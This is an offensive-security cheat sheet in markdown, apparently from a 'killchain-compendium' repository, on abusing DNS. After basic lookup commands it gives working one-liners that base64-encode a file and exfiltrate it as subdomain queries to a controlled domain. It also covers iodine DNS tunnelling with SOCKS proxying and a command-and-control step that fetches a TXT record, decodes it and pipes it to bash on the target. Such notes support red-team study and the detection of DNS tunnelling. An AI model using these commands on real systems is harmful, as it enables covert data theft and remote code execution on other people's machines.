killchain-compendium/exfiltration/dns/dns.md

113 lines
2.9 KiB
Markdown
Raw Normal View History

2021-10-31 02:43:24 +02:00
# DNS
* [Root Servers](https://www.iana.org/domains/root/servers)
* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
* [Records](https://www.cloudflare.com/learning/dns/dns-records/)
2022-08-30 22:16:10 +02:00
## Queries
### nslookup
```sh
nslookup type=txt <domain>
```
### Reverse lookup
* Stored inside `PTR` record
* Reverse IP may look like `<IP>.in-addr.arpa.`, but not via `drill` or `dig`
```sh
drill -x +short <IP>
```
## Exfiltration
* Add data to UDP DNS requests
* Capture traffic on an owned DNS server
* `253` is the max length of a DNS name, excluding dots
* `63` is the mx length of subdomains
* Encode the payload to hide it
## Infiltration
* Inside `TXT` or any other possible records
## Usage
### Manual Tunneling
Preconditions are:
1. Domain with an `A` record
2. `NS` record to controlled DNS to resolve the domain query
* Attach the encoded payload as the subdomain
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/'
```
* Query the DNS server
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/' | awk '{print "dig +short $1"}' | bash
```
* Optionally putting the payload in a single query via
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed 's/.*/&./' | tr -d '\n' | sed 's/$/example.com/' | awk '{print "dig +short" $1}' | bash
```
* Decode received data on the controlled DNS server via
```sh
echo "DomainBase64encoded.example.com" | sed 's/\.example\.com//;s/\.//g' | base64 -d
```
### Tunneling via Iodine
2021-10-31 02:43:24 +02:00
* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)
2022-08-30 22:16:10 +02:00
* Encapsulate protocols in side the DNS tunnel
2021-10-31 02:43:24 +02:00
* Start server on an outside DNS server. This may be a evs.
```sh
2022-08-30 22:16:10 +02:00
iodined -b <optionalListeningPort> -f 10.0.0.1</optionalCIDR> -c -P <optionalPassword> tunnel.test.com
2021-10-31 02:43:24 +02:00
```
2022-08-30 22:16:10 +02:00
2021-10-31 02:43:24 +02:00
* Use client via
```sh
2022-08-30 22:16:10 +02:00
iodine -f -r <optionalServer-IP> -P <optionlPassword> tunnel.test.com
2021-10-31 02:43:24 +02:00
```
2022-08-30 22:16:10 +02:00
2021-10-31 02:43:24 +02:00
* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
* Client gets a tunnel IP in the range of `10.0.0.0/8`
* Check connection via
```sh
ping <server-IP>
```
2022-08-30 22:16:10 +02:00
2021-10-31 02:43:24 +02:00
* Generate ssh-key and put in on the server
2022-08-30 22:16:10 +02:00
* Dynamic port forwarding to the network through the server as a proxy via ssh
2021-10-31 02:43:24 +02:00
```sh
2022-08-30 22:16:10 +02:00
ssh <user>@10.0.0.1 -4 -f -N -D <8080/1080>
2021-10-31 02:43:24 +02:00
```
2022-08-30 22:16:10 +02:00
* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy, or proxychains
2021-10-31 02:43:24 +02:00
```sh
2022-08-30 22:16:10 +02:00
proxychains curl http://$TARGET_IP/
curl --socks5 localhost:1080 http://$
2021-10-31 02:43:24 +02:00
```
2022-08-30 22:16:10 +02:00
### C2 over DNS
2021-10-31 02:43:24 +02:00
2022-08-30 22:16:10 +02:00
* Preconditions are the same as [Manual Tunneling](#Manual Tunneling)
* Plus: Data to control the appliances will be put into `TXT` record
* Data to control the appliances may be a shell script sending payloads via ICMP data field, DNS subdomains or execute something locally on the target
* Encode the payload and add it as `TXT` record
2021-10-31 02:43:24 +02:00
```sh
2022-08-30 22:16:10 +02:00
base64 ./script.sh
2021-10-31 02:43:24 +02:00
```
2022-08-30 22:16:10 +02:00
* Query and execute on target
```sh
dig +short -t TXT script.example.com | sed 's/\"//g'| base64 -d | bash
```
2021-10-31 02:43:24 +02:00